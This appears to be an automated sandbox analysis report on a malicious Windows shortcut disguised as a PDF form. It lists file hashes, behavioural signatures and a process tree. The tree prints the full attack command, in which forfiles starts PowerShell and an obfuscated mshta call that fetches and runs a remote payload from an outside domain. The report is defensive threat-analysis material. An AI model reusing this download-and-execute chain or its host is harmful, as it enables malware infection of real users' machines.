Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-10-2024 17:24
Static task
static1
Behavioral task
behavioral1
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
A/Instruction_1928.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
A/Instruction_1928.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
A/3rd_cc_form_Oct_2024.pdf.lnk
-
Size
1KB
-
MD5
d53df33a543f82f01cd65a969c026f0c
-
SHA1
92b8d55b4dccdcdfc076e08dc10e8f878075a4f7
-
SHA256
a1d7f4bc74b920f6ea79f7d3ed3ac9c544401605688fc968cc27e1a62b9482f6
-
SHA512
a4b62d3d7d9a1f251c6f2fc1eecec006cd32ed5f206990c84c0f1e3ebb6e86564c5042412c6b329e2a6d44bd2232a89add3db92703e3c779110f83105ea0c49e
Malware Config
Signatures
-
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2868 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exeforfiles.exedescription pid Process procid_target PID 2072 wrote to memory of 2768 2072 cmd.exe 32 PID 2072 wrote to memory of 2768 2072 cmd.exe 32 PID 2072 wrote to memory of 2768 2072 cmd.exe 32 PID 2768 wrote to memory of 2868 2768 forfiles.exe 33 PID 2768 wrote to memory of 2868 2768 forfiles.exe 33 PID 2768 wrote to memory of 2868 2768 forfiles.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\A\3rd_cc_form_Oct_2024.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m notep*.exe /c "powershell Start-Process \*i*\*2\msh*e https://urban-trek.shop/api/uz/0547131764/Linipute.json"2⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeStart-Process \*i*\*2\msh*e https://urban-trek.shop/api/uz/0547131764/Linipute.json3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-